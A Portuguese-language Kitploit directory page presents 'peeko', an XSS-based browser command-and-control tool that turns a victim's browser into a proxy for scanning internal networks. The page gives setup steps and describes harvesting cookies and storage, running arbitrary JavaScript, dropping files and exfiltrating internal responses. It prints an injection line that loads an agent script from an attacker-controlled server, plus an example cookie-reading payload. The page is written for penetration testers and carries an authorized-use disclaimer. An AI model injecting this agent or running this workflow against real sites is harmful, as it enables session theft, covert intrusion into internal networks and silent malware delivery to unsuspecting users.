Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
peeko — peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser. | Kitploit
Ferramentas/GitHubGitHub/b3rito/peeko
ReconnaissanceNetwork MappingPort ScanningLateral MovementWeb Application ExploitationData ExfiltrationInformation GatheringPost-ExploitationPenetration TestingCommand and Control
GitHubb3rito/peeko
230281há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

peeko

peeko – Browser-based XSS C2 for stealthy internal network exploration via infected browser.

Ver Repositório
Compartilhar

peeko

Versão: v1.1

peeko é uma ferramenta de C2 (Comando e Controle) baseada em navegador e movida a XSS, que utiliza o navegador da vítima como um proxy furtivo dentro de redes internas.

Por meio de um payload XSS injetado, o peeko estabelece uma conexão WebSocket com um servidor central, permitindo que um atacante controle remotamente o navegador da vítima para enviar requisições a serviços internos, escanear redes, exfiltrar dados ou até mesmo executar JavaScript arbitrário — tudo sem soltar um único binário.


Funcionalidades

  • Comunicação baseada em WebSocket entre atacante e vítimas
  • O navegador da vítima busca URLs internas e escaneia faixas de IP + portas
  • Painel de controle simples com:
    • Seletor de vítimas
    • Busca manual de URL
    • Escaneador de faixas de IP e portas
    • Execução de JS personalizado (manual ou automática)
    • Entrega de arquivos (automática/manual)
    • Coleta de informações do navegador e tokens (cookies, storage, etc.)
    • Visualizador de logs com cópia/salvamento como .txt ou .json
  • Suporte a HTTPS com certificados autoassinados
  • Leve: um único arquivo Python + recursos estáticos

Requisitos

  • Python 3.8+
  • OpenSSL
  • Linux/macOS (testado em sistemas baseados em Debian)

Início Rápido

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/b3rito/peeko.git
    cd peeko
    
  2. Instale as dependências:

    root@kitploit:~
    make install
    
  3. (Opcional) Torne os scripts executáveis:

    root@kitploit:~
    chmod +x gen-cert.sh start.sh
    
  4. Gere o certificado TLS autoassinado:

    root@kitploit:~
    make cert
    
  5. Substitua o placeholder SERVER-IP:

    Abra e edite os seguintes arquivos:

    • static/agent.js
    • static/control.html

    Substitua SERVER-IP pelo IP/domínio do seu servidor:

    root@kitploit:~
    wss://SERVER-IP:8443/ws → wss://192.168.30.136:8443/ws
    
  6. Inicie o servidor:

    root@kitploit:~
    make run
    
  7. Abra o painel de controle no seu navegador:


Funcionalidades do Painel de Controle

Funções Principais

  • Selecione e gerencie vítimas conectadas
  • Busque qualquer URL HTTPS interna/externa por meio da vítima
  • Escaneie faixas de LAN: 192.168.1.0/24, 10.0.0.10-20, etc.
  • Escaneie portas ou faixas específicas (ex.: 80, 443,8000-8080)

Entrega de Arquivos

  • Envie arquivos para a vítima (Base64 via WebSocket)
  • O navegador da vítima os baixa automaticamente
  • Suporta upload automático ao conectar

Coleta de Informações

  • Colete User Agent, plataforma, referrer, cookies, local/sessionStorage
  • Veja os resultados em JSON
  • Acionada manualmente ou coleta automática ao conectar

Execução de JS Personalizado

  • Execute JavaScript arbitrário no navegador da vítima
  • Use o formato exec:... para enviar
  • Suporta execução automática ao conectar
  • Exemplo: exec:alert(document.cookie);

Registro de Logs

  • Tudo é registrado (requisições, respostas, dumps de informações)
  • Copie ou exporte logs como .txt ou .json
  • UI minimalista projetada como um log de terminal

Explicação sobre CORS e Conteúdo Misto

As políticas modernas dos navegadores afetam o que o peeko pode acessar.

Respostas CORS

CabeçalhoConsegue ler o conteúdo?Observações
Access-Control-Allow-Origin: *✅Acesso total à resposta
Sem cabeçalho⚠️A resposta é opaca

Conteúdo Misto

A vítima se conecta via HTTPS. Se um alvo escaneado usar apenas HTTP:

  • O navegador bloqueará requisições de conteúdo misto
  • O peeko não consegue ler de endpoints http://
  • Sempre prefira alvos que usam HTTPS ao escanear

Na Prática

Durante um teste de penetração, se você encontrar um serviço interno que responda com Access-Control-Allow-Origin: * e seja servido via HTTPS, o peeko se torna um proxy furtivo capaz de exfiltrar dados internos diretamente do navegador da vítima, sem soltar arquivos ou abrir conexões de saída.


Estrutura do Projeto

root@kitploit:~
peeko/
├── main.py             → FastAPI WebSocket server  
├── start.sh            → Launch server  
├── gen-cert.sh         → Generate self-signed TLS certificate  
├── Makefile            → Install/run helpers  
├── requirements.txt    → Python dependencies  
├── certs/              → TLS key and cert will be stored here  
└── static/             → Browser client assets  
    ├── control.html    → Control panel (was attacker.html)  
    ├── infect.html     → Victim landing page  
    └── agent.js        → Victim agent script  

Fluxo de Trabalho

  1. O atacante injeta XSS (por vulnerabilidade armazenada ou refletida)
  2. O navegador da vítima se conecta via WebSocket ao servidor peeko
  3. O painel de controle permite que o atacante:
    • Escaneie a rede
    • Busque URLs
    • Despeje cookies, storage
    • Execute JS arbitrário
    • Exfiltre respostas
    • Solte arquivos

Casos de Uso

  • Mapeamento de rede interna via XSS
  • Pivoting baseado em navegador
  • Entrega silenciosa de arquivos / dropper JS

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de testes autorizados.
Qualquer uso do peeko fora de ambientes onde você tenha permissão explícita é estritamente proibido.
Você é responsável pelas suas próprias ações.


Autores

Escrito por b3rito na mes3hacklab & GioPpeTto

Baixar ferramenta
root@kitploit:~
https://192.168.30.136:8443/static/control.html
  • Injete o agente (exemplo de XSS):

    root@kitploit:~
    <script src="https://192.168.30.136:8443/static/agent.js"></script>
    
  • Origem restrita
    ❌
    Bloqueada ou ilegível